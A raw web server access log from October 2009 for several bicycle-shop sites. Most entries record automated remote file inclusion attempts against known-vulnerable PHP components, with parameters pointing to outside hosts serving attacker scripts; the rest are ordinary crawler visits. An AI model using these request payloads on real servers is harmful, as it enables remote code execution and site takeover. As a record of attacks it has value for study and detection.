114.4.8.14 - - [11/Oct/2009:03:39:03 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
114.4.8.14 - - [11/Oct/2009:03:39:03 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
114.4.8.14 - - [11/Oct/2009:03:39:03 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
180.80.7.66 - - [11/Oct/2009:03:39:52 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
180.80.7.66 - - [11/Oct/2009:03:39:52 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
180.80.7.66 - - [11/Oct/2009:03:39:52 -0700] "GET /skin/zero_vote/error.php?dir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
180.80.7.66 - - [11/Oct/2009:03:39:53 -0700] "GET /skin/zero_vote/error.php?dir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
180.80.7.66 - - [11/Oct/2009:03:39:53 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
180.80.7.66 - - [11/Oct/2009:03:39:53 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
114.4.8.14 - - [11/Oct/2009:03:40:42 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:03:45:46 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:03:45:46 -0700] "GET /skin/zero_vote/error.php?dir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:03:45:46 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:03:46:05 -0700] "GET /skin/zero_vote/error.php?dir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:03:46:05 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:03:46:05 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
72.11.145.8 - - [11/Oct/2009:03:52:12 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://88.27.253.185:8080/sempak.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
72.11.145.8 - - [11/Oct/2009:03:52:12 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://88.27.253.185:8080/sempak.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
72.11.145.8 - - [11/Oct/2009:03:52:12 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://88.27.253.185:8080/sempak.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
208.80.193.42 - - [11/Oct/2009:03:52:58 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; PeoplePal 3.0; SpamBlockerUtility 4.6.1)" "houstonbikeshop.com"
95.169.190.167 - - [11/Oct/2009:03:56:01 -0700] "GET /logs//ask_password.php?dir=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/lol/mydb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
95.169.190.167 - - [11/Oct/2009:03:56:01 -0700] "GET /ask_password.php?dir=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/lol/mydb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
95.169.190.167 - - [11/Oct/2009:03:56:01 -0700] "GET /logs/access.log%20%20//ask_password.php?dir=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/lol/mydb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
95.169.190.167 - - [11/Oct/2009:04:01:27 -0700] "GET /logs/access.log//ask_password.php?dir=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/lol/mydb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
65.55.51.114 - - [11/Oct/2009:04:02:05 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
124.115.1.8 - - [11/Oct/2009:04:04:21 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.svbikes.com"
95.169.190.167 - - [11/Oct/2009:04:40:44 -0700] "GET /ask_password.php?dir=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/lol/mydb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
95.169.190.167 - - [11/Oct/2009:04:40:44 -0700] "GET /logs/access.log%20%20//ask_password.php?dir=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/lol/mydb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
95.169.190.167 - - [11/Oct/2009:04:40:44 -0700] "GET /logs//ask_password.php?dir=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/lol/mydb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
95.169.190.167 - - [11/Oct/2009:04:45:33 -0700] "GET /logs/access.log//ask_password.php?dir=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/lol/mydb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
58.61.164.39 - - [11/Oct/2009:04:50:39 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.svbikes.com"
74.6.22.175 - - [11/Oct/2009:04:54:42 -0700] "GET /bullitinboard/viewtopic.php?p=16948 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
81.19.79.209 - - [11/Oct/2009:05:08:26 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "StackRambler/2.0 (MSIE incompatible)" "www.svbikes.com"
220.181.19.128 - - [11/Oct/2009:05:16:18 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Sogou-Test-Spider/4.0 (compatible; MSIE 5.5; Windows 98)" "www.houstonbikeshop.com"
220.181.19.128 - - [11/Oct/2009:05:16:28 -0700] "GET / HTTP/1.0" 200 1748 "-" "Sogou-Test-Spider/4.0 (compatible; MSIE 5.5; Windows 98)" "www.houstonbikeshop.com"
88.112.32.76 - - [11/Oct/2009:05:20:17 -0700] "GET /robots.txt HTTP/1.0" 404 275 "http://majestic12.co.uk/bot.php?I=488EDDD6B5-0000B04B594A2E2D-houstonbikeshop_com" "Mozilla/5.0 (compatible; MJ12bot/v1.3.0; http://www.majestic12.co.uk/bot.php?+)" "houstonbikeshop.com"
88.112.32.76 - - [11/Oct/2009:05:20:24 -0700] "GET /bullitinboard/viewtopic.php?p=15078 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.3.0; http://www.majestic12.co.uk/bot.php?+)" "houstonbikeshop.com"
200.219.245.149 - - [11/Oct/2009:05:24:27 -0700] "GET /logs/access.log//?_zb_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.219.245.149 - - [11/Oct/2009:05:24:27 -0700] "GET /?_zb_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.219.245.149 - - [11/Oct/2009:05:24:27 -0700] "GET /logs//?_zb_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.219.245.149 - - [11/Oct/2009:05:24:28 -0700] "GET /logs/access.log//?_zb_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.219.245.149 - - [11/Oct/2009:05:24:28 -0700] "GET /?_zb_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.219.245.149 - - [11/Oct/2009:05:24:28 -0700] "GET /logs//?_zb_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
58.61.164.141 - - [11/Oct/2009:05:31:44 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.svbikes.com"
91.194.10.126 - - [11/Oct/2009:05:32:13 -0700] "GET /logs/access.log//error.php?dir=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
91.194.10.126 - - [11/Oct/2009:05:32:16 -0700] "GET /error.php?dir=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
91.194.10.126 - - [11/Oct/2009:05:32:16 -0700] "GET /logs//error.php?dir=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
95.169.190.167 - - [11/Oct/2009:05:40:21 -0700] "GET /logs/access.log//skin/ggambo7002_board/comment_modify.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
95.169.190.167 - - [11/Oct/2009:05:40:21 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
95.169.190.167 - - [11/Oct/2009:05:40:21 -0700] "GET /logs//skin/ggambo7002_board/comment_modify.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
95.169.190.167 - - [11/Oct/2009:05:40:23 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
95.169.190.167 - - [11/Oct/2009:05:40:23 -0700] "GET /logs//skin/ggambo7002_board/comment_modify.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
95.169.190.167 - - [11/Oct/2009:05:40:23 -0700] "GET /logs/access.log//skin/ggambo7002_board/comment_modify.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
95.169.190.167 - - [11/Oct/2009:05:40:23 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
95.169.190.167 - - [11/Oct/2009:05:40:23 -0700] "GET /logs//skin/ggambo7002_board/comment_modify.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
95.169.190.167 - - [11/Oct/2009:05:40:23 -0700] "GET /logs/access.log//skin/ggambo7002_board/comment_modify.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
95.169.190.167 - - [11/Oct/2009:05:44:39 -0700] "GET /logs/access.log%20%20//skin/ggambo7002_board/comment_modify.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.241.32.194 - - [11/Oct/2009:05:45:29 -0700] "GET /logs//skin/ggambo7002_board/comment_modify.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.241.32.194 - - [11/Oct/2009:05:45:29 -0700] "GET /logs/access.log//skin/ggambo7002_board/comment_modify.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.241.32.194 - - [11/Oct/2009:05:45:29 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.241.32.194 - - [11/Oct/2009:05:45:37 -0700] "GET /logs//skin/ggambo7002_board/comment_modify.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.241.32.194 - - [11/Oct/2009:05:45:37 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.241.32.194 - - [11/Oct/2009:05:45:37 -0700] "GET /logs/access.log//skin/ggambo7002_board/comment_modify.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
174.133.148.98 - - [11/Oct/2009:05:47:01 -0700] "GET /zboard/skin/ggambo7002_board/comment_modify.php?dir=http://pyungan.or.kr/bbs/.injek/idtempek.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "houstonbikeshop.com"
200.241.32.194 - - [11/Oct/2009:05:48:05 -0700] "GET /logs/access.log%20%20//skin/ggambo7002_board/comment_modify.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.241.32.194 - - [11/Oct/2009:05:48:09 -0700] "GET /logs/access.log%20%20//skin/ggambo7002_board/comment_modify.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
95.169.190.167 - - [11/Oct/2009:05:48:15 -0700] "GET /logs/access.log%20%20//skin/ggambo7002_board/comment_modify.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
95.169.190.167 - - [11/Oct/2009:05:48:37 -0700] "GET /logs/access.log%20%20//skin/ggambo7002_board/comment_modify.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
174.133.148.98 - - [11/Oct/2009:05:50:14 -0700] "GET /logs/access.log//zboard/skin/ggambo7002_board/comment_modify.php?dir=http://pyungan.or.kr/bbs/.injek/idtempek.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "houstonbikeshop.com"
174.133.148.98 - - [11/Oct/2009:05:50:14 -0700] "GET /zboard/skin/ggambo7002_board/comment_modify.php?dir=http://pyungan.or.kr/bbs/.injek/idtempek.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "houstonbikeshop.com"
174.133.148.98 - - [11/Oct/2009:05:50:14 -0700] "GET /logs//zboard/skin/ggambo7002_board/comment_modify.php?dir=http://pyungan.or.kr/bbs/.injek/idtempek.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "houstonbikeshop.com"
65.55.51.114 - - [11/Oct/2009:05:53:20 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
114.4.8.14 - - [11/Oct/2009:06:24:53 -0700] "GET /logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
114.4.8.14 - - [11/Oct/2009:06:24:53 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
114.4.8.14 - - [11/Oct/2009:06:24:53 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
74.6.22.175 - - [11/Oct/2009:06:30:18 -0700] "GET /bullitinboard/viewtopic.php?p=15949 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
200.219.245.149 - - [11/Oct/2009:06:44:47 -0700] "GET /logs/access.log//?_zb_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.219.245.149 - - [11/Oct/2009:06:44:47 -0700] "GET /?_zb_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.219.245.149 - - [11/Oct/2009:06:44:47 -0700] "GET /logs//?_zb_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.219.245.149 - - [11/Oct/2009:06:45:10 -0700] "GET /?_zb_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.219.245.149 - - [11/Oct/2009:06:45:10 -0700] "GET /logs//?_zb_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.219.245.149 - - [11/Oct/2009:06:45:10 -0700] "GET /logs/access.log//?_zb_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
202.218.119.122 - - [11/Oct/2009:06:59:20 -0700] "GET /skin/zero_vote/error.php?dir=http://vik0.altervista.org/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
202.218.119.122 - - [11/Oct/2009:06:59:20 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://vik0.altervista.org/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
202.218.119.122 - - [11/Oct/2009:06:59:20 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://vik0.altervista.org/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
202.218.119.122 - - [11/Oct/2009:07:03:04 -0700] "GET /skin/zero_vote/error.php?dir=http://vik0.altervista.org/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
202.218.119.122 - - [11/Oct/2009:07:03:04 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://vik0.altervista.org/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
202.218.119.122 - - [11/Oct/2009:07:03:04 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://vik0.altervista.org/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.219.245.149 - - [11/Oct/2009:07:05:03 -0700] "GET /logs/access.log/////?_SERVER[DOCUMENT_ROOT]=http://kb27.co.kr/bbs///data/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "houstonbikeshop.com"
200.219.245.149 - - [11/Oct/2009:07:05:03 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://kb27.co.kr/bbs///data/scan.txt?? HTTP/1.1" 200 2376 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "houstonbikeshop.com"
200.219.245.149 - - [11/Oct/2009:07:05:03 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://kb27.co.kr/bbs///data/scan.txt?? HTTP/1.1" 200 1766 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "houstonbikeshop.com"
202.218.119.122 - - [11/Oct/2009:07:17:50 -0700] "GET /skin/zero_vote/error.php?dir=http://vik0.altervista.org/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
202.218.119.122 - - [11/Oct/2009:07:17:50 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://vik0.altervista.org/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
202.218.119.122 - - [11/Oct/2009:07:17:50 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://vik0.altervista.org/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.205.103.171 - - [11/Oct/2009:07:18:09 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.205.103.171 - - [11/Oct/2009:07:18:09 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.205.103.171 - - [11/Oct/2009:07:18:09 -0700] "GET /logs/access.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.205.103.171 - - [11/Oct/2009:07:19:17 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.205.103.171 - - [11/Oct/2009:07:19:17 -0700] "GET /logs/access.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.205.103.171 - - [11/Oct/2009:07:19:18 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
202.218.119.122 - - [11/Oct/2009:07:22:41 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://vik0.altervista.org/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
202.218.119.122 - - [11/Oct/2009:07:22:41 -0700] "GET /skin/zero_vote/error.php?dir=http://vik0.altervista.org/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
202.218.119.122 - - [11/Oct/2009:07:22:41 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://vik0.altervista.org/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.228.191.194 - - [11/Oct/2009:07:42:20 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.abmgarciainformatica.com.br/funcoes/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.228.191.194 - - [11/Oct/2009:07:42:20 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.abmgarciainformatica.com.br/funcoes/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.228.191.194 - - [11/Oct/2009:07:42:20 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.abmgarciainformatica.com.br/funcoes/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:07:46:36 -0700] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:07:46:36 -0700] "GET /logs/access.log%20%20//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:07:46:36 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:07:48:35 -0700] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.251.147.194 - - [11/Oct/2009:07:48:35 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
